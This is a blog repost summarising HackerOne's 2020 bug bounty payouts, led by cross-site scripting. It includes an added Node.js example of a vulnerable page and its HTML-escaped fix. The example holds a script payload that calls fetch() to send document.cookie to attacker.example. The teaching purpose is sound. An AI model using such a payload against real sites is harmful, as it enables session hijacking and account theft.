Cross-site scripting (XSS) was one of the most prominent vulnerabilities of 2020: it earned ethical hackers the most in bounty awards last year and topped the list of the 10 most-rewarded vulnerability types published by HackerOne, a company that hosts global bug bounty programs and maintains a database of 200,000 vulnerabilities found by ethical hackers. The ranking is based on the total bounties awarded to ethical hackers for each vulnerability type as of April 2020. In this article at Threatpost, Elizabeth Montalbano shares the facts and figures behind the rise in ethical hacking payouts.
The Potential Spike
XSS lets threat actors inject malicious scripts into web pages viewed by potential victims. Reports of XSS flaws earned ethical hackers $4.2 million in total bug-bounty awards in 2020, a 26 percent increase over the amount paid for XSS findings in 2019, according to the report.
According to HackerOne, organizations worldwide paid about $23.5 million in bug bounties to ethical hackers for all the flaws uncovered in 2020. Attackers use XSS vulnerabilities to hijack online user accounts and steal personal data, including passwords, bank account numbers and credit card details.
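To make the mechanism above concrete, here is an added Node.js illustration (not code from the Threatpost article or from HackerOne's report). It shows a reflected XSS sink, a search page that concatenates the user's query straight into HTML, beside the same page with HTML escaping applied. The page name, the cookie-stealing payload, the `attacker.example` host and the helper names are all constructed for this example.

```javascript
// Added example: a reflected XSS sink and its hardened form.
// Not code from the Threatpost article or HackerOne; the page, the payload,
// the attacker host and the helper names are constructed for illustration.

// A constructed query-string value of the kind an attacker embeds in a link.
// If it runs in the victim's browser, it sends the session cookie to the attacker.
const ATTACK_QUERY =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Vulnerable: untrusted input is interpolated directly into the HTML body,
// so the browser parses the attacker's <script> element as part of the page.
function renderSearchUnsafe(query) {
  return `<h1>Search</h1><p>Results for: ${query}</p>`;
}

// Hardened: escape the characters that change meaning in an HTML text context
// (&, <, >, " and ') so the input is displayed as text, not parsed as markup.
function escapeHtml(value) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderSearchSafe(query) {
  return `<h1>Search</h1><p>Results for: ${escapeHtml(query)}</p>`;
}

// Crude check used here only to demonstrate the difference: does the
// rendered output contain a <script ...> start tag a browser would execute?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Stand-alone demonstration.
console.log('unsafe :', renderSearchUnsafe(ATTACK_QUERY));
console.log('safe   :', renderSearchSafe(ATTACK_QUERY));
console.log('script tag in unsafe output:', containsScriptTag(renderSearchUnsafe(ATTACK_QUERY)));
console.log('script tag in safe output  :', containsScriptTag(renderSearchSafe(ATTACK_QUERY)));

module.exports = { ATTACK_QUERY, renderSearchUnsafe, renderSearchSafe, escapeHtml, containsScriptTag };
```

`escapeHtml` is correct only for data placed in HTML element text; a value written into an attribute, a URL or inline JavaScript needs context-specific encoding (or a templating engine that applies it automatically). Marking session cookies `HttpOnly` and deploying a Content Security Policy limit what an injected script can do if an escaping gap is missed, which is why pentesters still find XSS in the account-takeover chains the article describes.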
Though XSS accounts for about 18 percent of all vulnerabilities reported so far, ethical hackers are underpaid for finding it, per HackerOne. The average bounty for an XSS report is approximately $501, far below the $3,650 paid on average for a critical flaw. In effect, ethical hackers let organizations fix this most common bug class cheaply.
Ethical hackers are paid most for identifying rare vulnerabilities. Miju Han, Senior Director of Product Management at HackerOne, notes that the most common vulnerabilities are the cheapest. Only three vulnerability types, improper access control, server-side request forgery (SSRF) and information disclosure, saw bounty awards rise by more than 10 percent in 2020. The figures show how a well-priced bounty program motivates ethical hackers to expose the bugs in your IT infrastructure.
Click on the following link to read the original article: https://threatpost.com/bug-bounty-awards-spike-2020/160719/
The post Bug Bounty Awards to Laud Ethical Hacker’s Potential appeared first on AITS CAI’s Accelerating IT Success.